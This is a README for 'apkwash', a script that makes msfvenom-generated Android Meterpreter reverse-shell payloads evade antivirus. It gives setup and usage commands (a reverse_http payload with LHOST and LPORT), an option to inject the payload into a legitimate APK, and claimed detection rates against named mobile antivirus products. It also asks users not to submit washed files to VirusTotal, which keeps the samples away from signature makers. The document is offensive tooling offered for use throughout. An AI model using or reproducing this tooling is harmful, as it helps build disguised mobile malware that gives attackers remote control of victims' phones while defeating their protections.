# apkwash
Android APK Antivirus evasion for msfvenom generated payloads.
<br><br>
<b> -- Please do not upload "washed" files to VirusTotal.com -- </b><br>
<br>
<br>
<b> Tested on Kali linux rolling. </b><br>
<br>
<br>
<b>Setup:</b><br>
apt-get update && apt-get upgrade<br>
chmod +x apkwash<br>
mv apkwash /usr/local/bin/.<br>
<br>
<b>On first run:</b><br>
-Downloads and places apktool.jar in the user's /usr/local/bin directory<br>
-Generates debug keystore for signing. Places it in ~/.android/<br>
<br>
<b>Usage:</b><br>
apktool -p android/meterpreter/reverse_http LHOST=192.168.1.40 LPORT=1337 -o \<payload>.apk<br>
<br>
<b>Input Options:</b><br>
-p | --payload \<payload>       : (Default: android/meterpreter/reverse_https) This sets the payload to be generated by msfvenom.<br>
-o | --output \<outfile.apk>    : (Default: payload.apk) This sets the name of the APK created as well as the output filename.<br>
-x | --original \<infile.apk>   : (MSFVenom -x) Input APK to inject the payload into.<br>
-x | --newkey                   : For auto-removing debug key to allow the creation of a new key within the script<br>
-d | --debug                    : Don't remove the /tmp/payload directory<br>
-v | --verbose                  : Don't mask output of commands<br>
-h | --help                      : Help information<br>
<br>
<b>Output:</b><br>
\<payload>.apk & \<payload>.listener<br>
<br>
<b>Antivirus detection:</b><br>
0/35 on nodistribute - 20Mar17<br>
Verified for AVG mobile<br>
Verified for Kaspersky mobile<br>
Verified for Lookout<br>
FLAGGED BY AVAST!<br>
APK:CloudRep[Susp] is the report for the suspicious app on Avast. <br>
Per Avast: "the APK:CloudRep [Susp] is a warning-like message for applications that are very new/rare/previously unseen in our userbase." Based on this alone it doesn't appear we can modify anything to avoid being flagged. It allows the user to accept the risks, or uninstall the app.<br>
<br>
<b>Modifiations:</b><br>
Feel free to open the script and make improvements. This script basically utilizes APKTool to open the package, uses sed to replace strings that flag AV, recompiles, then signs.<br>
<br>
<br>
<b>Files:</b><br>
/tmp/payload    (Main files to review: AndroidManifest.xml and the smali files)
<br>
<br>
<b>Debugging</b><br>
Comment out the removal of the /tmp/payload directory to see the file structure that was compiled.<br><br><br>
<b>If you are seeing other "Payload".smali files in /tmp/payload/smali/com/var1/var2/ then be sure you have an updated system. I have found an older msfvenom version output a different payload that will be flagged by AVG (1/35 on nodistribute). Just making sure you are completely updated should resolve this.</b>
